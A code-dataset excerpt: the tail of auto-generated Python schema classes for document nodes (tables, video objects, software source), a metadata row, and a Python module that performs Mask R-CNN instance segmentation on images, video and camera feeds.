if softwareRequirements is not None:
self.softwareRequirements = softwareRequirements
if softwareVersion is not None:
self.softwareVersion = softwareVersion
class SoftwareSession(Thing):
"""
Represents a runtime session with the resources and image that is required
by software to execute.
"""
environment: "Environment"
cpuResource: Optional["ResourceParameters"] = None
memoryResource: Optional["ResourceParameters"] = None
volumeMounts: Optional[Array["Mount"]] = None
def __init__(
self,
environment: "Environment",
alternateNames: Optional[Array[str]] = None,
cpuResource: Optional["ResourceParameters"] = None,
description: Optional[Union[str, Array["Node"]]] = None,
id: Optional[str] = None,
memoryResource: Optional["ResourceParameters"] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
url: Optional[str] = None,
volumeMounts: Optional[Array["Mount"]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
name=name,
url=url
)
if environment is not None:
self.environment = environment
if cpuResource is not None:
self.cpuResource = cpuResource
if memoryResource is not None:
self.memoryResource = memoryResource
if volumeMounts is not None:
self.volumeMounts = volumeMounts
class SoftwareSourceCode(CreativeWork):
"""
Computer programming source code. Example: Full (compile ready) solutions,
code snippet samples, scripts, templates.
"""
codeRepository: Optional[str] = None
codeSampleType: Optional[str] = None
maintainers: Optional[Array[Union["Organization", "Person"]]] = None
programmingLanguage: Optional[str] = None
runtimePlatform: Optional[Array[str]] = None
softwareRequirements: Optional[Array[Union["SoftwareSourceCode", "SoftwareApplication", str]]] = None
targetProducts: Optional[Array["SoftwareApplication"]] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
codeRepository: Optional[str] = None,
codeSampleType: Optional[str] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
maintainers: Optional[Array[Union["Organization", "Person"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
programmingLanguage: Optional[str] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
runtimePlatform: Optional[Array[str]] = None,
softwareRequirements: Optional[Array[Union["SoftwareSourceCode", "SoftwareApplication", str]]] = None,
targetProducts: Optional[Array["SoftwareApplication"]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if codeRepository is not None:
self.codeRepository = codeRepository
if codeSampleType is not None:
self.codeSampleType = codeSampleType
if maintainers is not None:
self.maintainers = maintainers
if programmingLanguage is not None:
self.programmingLanguage = programmingLanguage
if runtimePlatform is not None:
self.runtimePlatform = runtimePlatform
if softwareRequirements is not None:
self.softwareRequirements = softwareRequirements
if targetProducts is not None:
self.targetProducts = targetProducts
class StringSchema(Entity):
"""A schema specifying constraints on a string node."""
maxLength: Optional[float] = None
minLength: Optional[float] = None
pattern: Optional[str] = None
def __init__(
self,
id: Optional[str] = None,
maxLength: Optional[float] = None,
meta: Optional[Dict[str, Any]] = None,
minLength: Optional[float] = None,
pattern: Optional[str] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if maxLength is not None:
self.maxLength = maxLength
if minLength is not None:
self.minLength = minLength
if pattern is not None:
self.pattern = pattern
class Strong(Mark):
"""Strongly emphasised content."""
def __init__(
self,
content: Array["InlineContent"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
content=content,
id=id,
meta=meta
)
class Subscript(Mark):
"""Subscripted content."""
def __init__(
self,
content: Array["InlineContent"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
content=content,
id=id,
meta=meta
)
class Superscript(Mark):
"""Superscripted content."""
def __init__(
self,
content: Array["InlineContent"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
content=content,
id=id,
meta=meta
)
class Table(CreativeWork):
"""A table."""
rows: Array["TableRow"]
def __init__(
self,
rows: Array["TableRow"],
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
authors=authors,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if rows is not None:
self.rows = rows
class TableCell(Entity):
"""A cell within a `Table`."""
content: Array["InlineContent"]
cellType: Optional["ECellType"] = None
colspan: Optional[int] = None
name: Optional[str] = None
rowspan: Optional[int] = None
def __init__(
self,
content: Array["InlineContent"],
cellType: Optional["ECellType"] = None,
colspan: Optional[int] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
rowspan: Optional[int] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if content is not None:
self.content = content
if cellType is not None:
self.cellType = cellType
if colspan is not None:
self.colspan = colspan
if name is not None:
self.name = name
if rowspan is not None:
self.rowspan = rowspan
class TableRow(Entity):
"""A row within a Table."""
cells: Array["TableCell"]
rowType: Optional["ERowType"] = None
def __init__(
self,
cells: Array["TableCell"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
rowType: Optional["ERowType"] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if cells is not None:
self.cells = cells
if rowType is not None:
self.rowType = rowType
class ThematicBreak(Entity):
"""
A thematic break, such as a scene change in a story, a transition to
another topic, or a new document.
"""
def __init__(
self,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
class TupleSchema(Entity):
"""A schema specifying constraints on an array of heterogeneous items."""
items: Optional[Array["SchemaTypes"]] = None
def __init__(
self,
id: Optional[str] = None,
items: Optional[Array["SchemaTypes"]] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if items is not None:
self.items = items
class VideoObject(MediaObject):
"""A video file."""
caption: Optional[str] = None
thumbnail: Optional["ImageObject"] = None
transcript: Optional[str] = None
def __init__(
self,
contentUrl: str,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
bitrate: Optional[float] = None,
caption: Optional[str] = None,
content: Optional[Array["Node"]] = None,
contentSize: Optional[float] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
embedUrl: Optional[str] = None,
format: Optional[str] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
thumbnail: Optional["ImageObject"] = None,
title: Optional[Union[str, Array["Node"]]] = None,
transcript: Optional[str] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
contentUrl=contentUrl,
alternateNames=alternateNames,
authors=authors,
bitrate=bitrate,
content=content,
contentSize=contentSize,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
embedUrl=embedUrl,
format=format,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
title=title,
url=url,
version=version
)
if caption is not None:
self.caption = caption
if thumbnail is not None:
self.thumbnail = thumbnail
if transcript is not None:
self.transcript = transcript
"""
Union type for valid block content.
"""
BlockContent = Union["CodeBlock", "CodeChunk", "Heading", "List", "ListItem", "Paragraph", "QuoteBlock", "Table", "ThematicBreak"]
"""
Union type for call CreativeWork types.
"""
CreativeWorkTypes = Union["CreativeWork", "Article", "AudioObject", "Collection", "Datatable", "Figure", "ImageObject", "MediaObject", "Periodical", "PublicationIssue", "PublicationVolume", "SoftwareApplication", "SoftwareSourceCode", "Table", "VideoObject"]
"""
Union type for valid inline content.
"""
InlineContent = Union[None, bool, int, float, str, "CodeFragment", "CodeExpression", "Delete", "Emphasis", "ImageObject", "Link", "Quote", "Strong", "Subscript", "Superscript", "Cite", "CiteGroup"]
"""
Union type for all valid nodes.
"""
Node = Union[None, bool, float, int, str, Array[Any], Dict[str, Any], "Entity"]
"""
Union type for all data schemas.
"""
SchemaTypes = Union["ConstantSchema", "EnumSchema", "BooleanSchema", "NumberSchema", "IntegerSchema", "StringSchema", "ArraySchema", "TupleSchema"]
| 32.245803 | 258 | 0.571375 | 7,904 | 80,679 | 5.76746 | 0.057692 | 0.052055 | 0.069758 | 0.052757 | 0.785811 | 0.767867 | 0.74898 | 0.737354 | 0.705831 | 0.639473 | 0 | 0.000072 | 0.312969 | 80,679 | 2,501 | 259 | 32.258697 | 0.822349 | 0.0427 | 0 | 0.7406 | 1 | 0 | 0.060821 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030462 | false | 0 | 0.002856 | 0 | 0.151832 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e0b556170871510fed668f85e96cb960bac63535 | 26,884 | py | Python | xtreme_vision/Segmentation/maskrcnn/instance.py | rjalif199/Xtreme-Vision | 15ff71ccdcdbb76637524fe30559ce1671f3bbfb | [
"MIT"
] | 81 | 2020-11-21T07:21:38.000Z | 2022-02-14T18:31:55.000Z | xtreme_vision/Segmentation/maskrcnn/instance.py | rjalif199/Xtreme-Vision | 15ff71ccdcdbb76637524fe30559ce1671f3bbfb | [
"MIT"
] | 10 | 2020-12-01T13:00:48.000Z | 2021-07-18T10:40:01.000Z | xtreme_vision/Segmentation/maskrcnn/instance.py | rjalif199/Xtreme-Vision | 15ff71ccdcdbb76637524fe30559ce1671f3bbfb | [
"MIT"
] | 23 | 2020-11-24T06:30:23.000Z | 2021-07-05T01:37:58.000Z | import cv2
import numpy as np
import random
import os
from .mask_rcnn import MaskRCNN
from .config import Config
import colorsys
import time
class configuration(Config):
NAME = "configuration"
coco_config = configuration(BACKBONE = "resnet101", NUM_CLASSES = 81, class_names = ["BG"], IMAGES_PER_GPU = 1, IMAGE_MAX_DIM = 1024, IMAGE_MIN_DIM = 800, IMAGE_RESIZE_MODE ="square", GPU_COUNT = 1)
class instance_segmentation():
def __init__(self):
self.model_dir = os.getcwd()
def load_model(self, model_path):
self.model = MaskRCNN(mode = "inference", model_dir = self.model_dir, config = coco_config)
self.model.load_weights(model_path, by_name= True)
def segmentImage(self, image_path, show_bboxes = False, output_image_name = None, verbose = None, custom=None):
image = cv2.imread(image_path)
new_img = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
# Run detection
if verbose is not None:
print("Processing image...")
results = self.model.detect([new_img])
coco_config.class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',
'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',
'kite', 'baseball bat', 'baseball glove', 'skateboard',
'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',
'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',
'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',
'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
'teddy bear', 'hair drier', 'toothbrush']
r = results[0]
if show_bboxes == False:
#apply segmentation mask
output = display_instances(image, r['rois'], r['masks'], r['class_ids'], coco_config.class_names, custom)
if output_image_name is not None:
cv2.imwrite(output_image_name, output)
print("Processed image saved successfully in your current working directory.")
return r, output
else:
#apply segmentation mask with bounding boxes
output = display_box_instances(image, r['rois'], r['masks'], r['class_ids'], coco_config.class_names, r['scores'], custom)
if output_image_name is not None:
cv2.imwrite(output_image_name, output)
print("Processed Image saved successfully in your current working directory.")
return r, output
def segmentFrame(self, frame, show_bboxes = False, output_image_name = None, verbose = None, custom=None):
new_img = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
if verbose is not None:
print("Processing frame...")
# Run detection
results = self.model.detect([new_img])
coco_config.class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',
'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',
'kite', 'baseball bat', 'baseball glove', 'skateboard',
'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',
'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',
'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',
'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
'teddy bear', 'hair drier', 'toothbrush']
r = results[0]
if show_bboxes == False:
#apply segmentation mask
output = display_instances(frame, r['rois'], r['masks'], r['class_ids'], coco_config.class_names, custom)
if output_image_name is not None:
cv2.imwrite(output_image_name, output)
print("Processed image saved successfully in your current working directory.")
return r, output
else:
#apply segmentation mask with bounding boxes
output = display_box_instances(frame, r['rois'], r['masks'], r['class_ids'], coco_config.class_names, r['scores'], custom)
if output_image_name is not None:
cv2.imwrite(output_image_name, output)
print("Processed Image saved successfully in your current working directory.")
return r, output
def process_video(self, video_path, show_bboxes = False, output_video_name = None, frames_per_second = None, custom=None):
capture = cv2.VideoCapture(video_path)
length = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))
print(f'\nThere are {length} Frames in this video')
print('-' * 20)
print('Detecting Objects in the Video... Please Wait...')
print('-' * 20)
width = int(capture.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
codec = cv2.VideoWriter_fourcc(*'DIVX')
coco_config.class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',
'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',
'kite', 'baseball bat', 'baseball glove', 'skateboard',
'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',
'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',
'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',
'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
'teddy bear', 'hair drier', 'toothbrush']
if frames_per_second is not None:
save_video = cv2.VideoWriter(output_video_name, codec, frames_per_second, (width, height))
counter = 0
start = time.time()
if show_bboxes == False:
while True:
counter +=1
ret, frame = capture.read()
if ret:
# Run detection
results = self.model.detect([frame])
# print("No. of frames:", counter)
r = results[0]
#apply segmentation mask
output = display_instances(frame, r['rois'], r['masks'], r['class_ids'], coco_config.class_names, custom)
output = cv2.resize(output, (width,height), interpolation=cv2.INTER_AREA)
if output_video_name is not None:
save_video.write(output)
else:
break
end = time.time()
print(f"Processed {length} frames in {end-start:.1f} seconds")
capture.release()
if frames_per_second is not None:
save_video.release()
return r, output
else:
while True:
counter +=1
ret, frame = capture.read()
if ret:
# Run detection
results = self.model.detect([frame])
# print("No. of frames:", counter)
r = results[0]
#apply segmentation mask with bounding boxes
output = display_box_instances(frame, r['rois'], r['masks'], r['class_ids'], coco_config.class_names, r['scores'], custom)
output = cv2.resize(output, (width,height), interpolation=cv2.INTER_AREA)
if output_video_name is not None:
save_video.write(output)
else:
break
capture.release()
end = time.time()
print(f"Processed {counter} frames in {end-start:.1f} seconds")
if frames_per_second is not None:
save_video.release()
return r, output
def process_camera(self, cam, show_bboxes = False, output_video_name = None, frames_per_second = None, show_frames = None, frame_name = None, verbose = None, check_fps = False, custom=None):
capture = cam
width = int(capture.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
codec = cv2.VideoWriter_fourcc(*'DIVX')
if frames_per_second is not None:
save_video = cv2.VideoWriter(output_video_name, codec, frames_per_second, (width, height))
counter = 0
start = time.time()
coco_config.class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',
'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',
'kite', 'baseball bat', 'baseball glove', 'skateboard',
'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',
'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',
'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',
'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
'teddy bear', 'hair drier', 'toothbrush']
if show_bboxes == False:
while True:
counter +=1
ret, frame = capture.read()
if ret:
# Run detection
results = self.model.detect([frame])
# if verbose is not None:
# print("No. of frames:", counter)
r = results[0]
#apply segmentation mask
output = display_instances(frame, r['rois'], r['masks'], r['class_ids'], coco_config.class_names, custom)
output = cv2.resize(output, (width,height), interpolation=cv2.INTER_AREA)
if show_frames == True:
if frame_name is not None:
cv2.imshow(frame_name, output)
if cv2.waitKey(25) & 0xFF == ord('q'):
break
if output_video_name is not None:
save_video.write(output)
else:
break
end = time.time()
if verbose is not None:
print(f"Processed {counter} frames in {end-start:.1f} seconds")
if check_fps == True:
out = capture.get(cv2.CAP_PROP_FPS)
print(f"{out} frames per second")
capture.release()
if frames_per_second is not None:
save_video.release()
return r, output
else:
while True:
counter +=1
ret, frame = capture.read()
if ret:
# Run detection
results = self.model.detect([frame])
# if verbose is not None:
# print("No. of frames:", counter)
r = results[0]
#apply segmentation mask with bounding boxes
output = display_box_instances(frame, r['rois'], r['masks'], r['class_ids'], coco_config.class_names, r['scores'], custom)
output = cv2.resize(output, (width,height), interpolation=cv2.INTER_AREA)
if show_frames == True:
if frame_name is not None:
cv2.imshow(frame_name, output)
if cv2.waitKey(25) & 0xFF == ord('q'):
break
if output_video_name is not None:
save_video.write(output)
else:
break
end = time.time()
if verbose is not None:
print(f"Processed {counter} frames in {end-start:.1f} seconds")
if check_fps == True:
out = capture.get(cv2.CAP_PROP_FPS)
print(f"{out} frames per second")
capture.release()
if frames_per_second is not None:
save_video.release()
return r, output
#############################################################
#############################################################
""" CLASS FOR PERFORMING INFERENCE WITH A CUSTOM MODEL """
#############################################################
#############################################################
class custom_segmentation:
def __init__(self):
self.model_dir = os.getcwd()
def inferConfig(self,name = None, network_backbone = "resnet101", num_classes = 1, class_names = ["BG"], batch_size = 1, image_max_dim = 512, image_min_dim = 512, image_resize_mode ="square", gpu_count = 1):
self.config = Config(BACKBONE = network_backbone, NUM_CLASSES = 1 + num_classes, class_names = class_names,
IMAGES_PER_GPU = batch_size, IMAGE_MAX_DIM = image_max_dim, IMAGE_MIN_DIM = image_min_dim, IMAGE_RESIZE_MODE = image_resize_mode,
GPU_COUNT = gpu_count)
def load_model(self, model_path):
#load the weights for COCO
self.model = MaskRCNN(mode="inference", model_dir = self.model_dir, config=self.config)
self.model.load_weights(model_path, by_name=True)
def segmentImage(self, image_path, show_bboxes = False, output_image_name = None, verbose = None):
image = cv2.imread(image_path)
new_img = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
# Run detection
if verbose is not None:
print("Processing image...")
results = self.model.detect([new_img])
r = results[0]
if show_bboxes == False:
#apply segmentation mask
output = display_instances(image, r['rois'], r['masks'], r['class_ids'],self.config.class_names)
if output_image_name is not None:
cv2.imwrite(output_image_name, output)
print("Processed image saved successfully in your current working directory.")
return r, output
else:
#apply segmentation mask with bounding boxes
output = display_box_instances(image, r['rois'], r['masks'], r['class_ids'], self.config.class_names, r['scores'])
if output_image_name is not None:
cv2.imwrite(output_image_name, output)
print("Processed Image saved successfully in your current working directory.")
return r, output
def segmentFrame(self, frame, show_bboxes = False, output_image_name = None, verbose= None):
new_img = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
if verbose is not None:
print("Processing frame...")
# Run detection
results = self.model.detect([new_img])
r = results[0]
if show_bboxes == False:
#apply segmentation mask
output = display_instances(frame, r['rois'], r['masks'], r['class_ids'], self.config.class_names)
if output_image_name is not None:
cv2.imwrite(output_image_name, output)
print("Processed image saved successfully in your current working directory.")
return r, output
else:
#apply segmentation mask with bounding boxes
output = display_box_instances(frame, r['rois'], r['masks'], r['class_ids'], self.config.class_names, r['scores'])
if output_image_name is not None:
cv2.imwrite(output_image_name, output)
print("Processed Image saved successfully in your current working directory.")
return r, output
def process_video(self, video_path, show_bboxes = False, output_video_name = None, frames_per_second = None):
capture = cv2.VideoCapture(video_path)
width = int(capture.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
codec = cv2.VideoWriter_fourcc(*'DIVX')
if frames_per_second is not None:
save_video = cv2.VideoWriter(output_video_name, codec, frames_per_second, (width, height))
counter = 0
start = time.time()
if show_bboxes == False:
while True:
counter +=1
ret, frame = capture.read()
if ret:
# Run detection
results = self.model.detect([frame], verbose=0)
print("No. of frames:", counter)
r = results[0]
#apply segmentation mask
output = display_instances(frame, r['rois'], r['masks'], r['class_ids'], self.config.class_names)
output = cv2.resize(output, (width,height), interpolation=cv2.INTER_AREA)
if output_video_name is not None:
save_video.write(output)
else:
break
end = time.time()
print(f"Processed {counter} frames in {end-start:.1f} seconds")
capture.release()
if frames_per_second is not None:
save_video.release()
return r, output
else:
while True:
counter +=1
ret, frame = capture.read()
if ret:
# Run detection
results = self.model.detect([frame], verbose=0)
print("No. of frames:", counter)
r = results[0]
#apply segmentation mask with bounding boxes
output = display_box_instances(frame, r['rois'], r['masks'], r['class_ids'], self.config.class_names, r['scores'])
output = cv2.resize(output, (width,height), interpolation=cv2.INTER_AREA)
if output_video_name is not None:
save_video.write(output)
else:
break
capture.release()
end = time.time()
print(f"Processed {counter} frames in {end-start:.1f} seconds")
if frames_per_second is not None:
save_video.release()
return r, output
def process_camera(self, cam, show_bboxes = False, output_video_name = None, frames_per_second = None, show_frames = None, frame_name = None, verbose = None, check_fps = False):
capture = cam
width = int(capture.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
codec = cv2.VideoWriter_fourcc(*'DIVX')
if frames_per_second is not None:
save_video = cv2.VideoWriter(output_video_name, codec, frames_per_second, (width, height))
counter = 0
start = time.time()
if show_bboxes == False:
while True:
counter +=1
ret, frame = capture.read()
if ret:
# Run detection
results = self.model.detect([frame])
if verbose is not None:
print("No. of frames:", counter)
r = results[0]
#apply segmentation mask
output = display_instances(frame, r['rois'], r['masks'], r['class_ids'], self.config.class_names)
output = cv2.resize(output, (width,height), interpolation=cv2.INTER_AREA)
if show_frames == True:
if frame_name is not None:
cv2.imshow(frame_name, output)
if cv2.waitKey(25) & 0xFF == ord('q'):
break
if output_video_name is not None:
save_video.write(output)
else:
break
end = time.time()
if verbose is not None:
print(f"Processed {counter} frames in {end-start:.1f} seconds")
if check_fps == True:
out = capture.get(cv2.CAP_PROP_FPS)
print(f"{out} frames per second")
capture.release()
if frames_per_second is not None:
save_video.release()
return r, output
else:
while True:
counter +=1
ret, frame = capture.read()
if ret:
# Run detection
results = self.model.detect([frame])
if verbose is not None:
print("No. of frames:", counter)
r = results[0]
#apply segmentation mask with bounding boxes
output = display_box_instances(frame, r['rois'], r['masks'], r['class_ids'], self.config.class_names, r['scores'])
output = cv2.resize(output, (width,height), interpolation=cv2.INTER_AREA)
if show_frames == True:
if frame_name is not None:
cv2.imshow(frame_name, output)
if cv2.waitKey(25) & 0xFF == ord('q'):
break
if output_video_name is not None:
save_video.write(output)
else:
break
end = time.time()
if verbose is not None:
print(f"Processed {counter} frames in {end-start:.1f} seconds")
if check_fps == True:
out = capture.get(cv2.CAP_PROP_FPS)
print(f"{out} frames per seconds")
capture.release()
if frames_per_second is not None:
save_video.release()
return r, output
################VISUALIZATION CODE ##################
def random_colors(N, bright=True):
"""
Generate random colors.
To get visually distinct colors, generate them in HSV space then
convert to RGB.
"""
brightness = 1.0 if bright else 0.7
hsv = [(i / N, 1, brightness) for i in range(N)]
colors = list(map(lambda c: colorsys.hsv_to_rgb(*c), hsv))
random.shuffle(colors)
return colors
def apply_mask(image, mask, color, alpha=0.5):
"""Apply the given mask to the image.
"""
for c in range(3):
image[:, :, c] = np.where(mask == 1,
image[:, :, c] *
(1 - alpha) + alpha * color[c] * 255,
image[:, :, c])
return image
def display_instances(image, boxes, masks, class_ids, class_name, custom=None):
n_instances = boxes.shape[0]
colors = random_colors(n_instances)
if not n_instances:
print('NO INSTANCES TO DISPLAY')
else:
assert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0]
for i, color in enumerate(colors):
if custom != None:
check_name = class_name[class_ids[i]]
check = custom.get(check_name, 'invalid')
if (check == "invalid"):
continue
mask = masks[:, :, i]
image = apply_mask(image, mask, color)
return image
def display_box_instances(image, boxes, masks, class_ids, class_name, scores, custom=None):
n_instances = boxes.shape[0]
colors = random_colors(n_instances)
assert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0]
for i, color in enumerate(colors):
if not np.any(boxes[i]):
continue
y1, x1, y2, x2 = boxes[i]
label = class_name[class_ids[i]]
if custom != None:
check = custom.get(label, 'invalid')
if (check == "invalid"):
continue
score = scores[i] if scores is not None else None
caption = '{} {:.2f}'.format(label, score) if score else label
mask = masks[:, :, i]
image = apply_mask(image, mask, color)
color_rec = [int(c) for c in np.array(colors[i]) * 255]
image = cv2.rectangle(image, (x1, y1), (x2, y2), color_rec, 2)
image = cv2.putText(
image, caption, (x1, y1), cv2.FONT_HERSHEY_COMPLEX, 0.5, color = (255, 255, 255))
return image
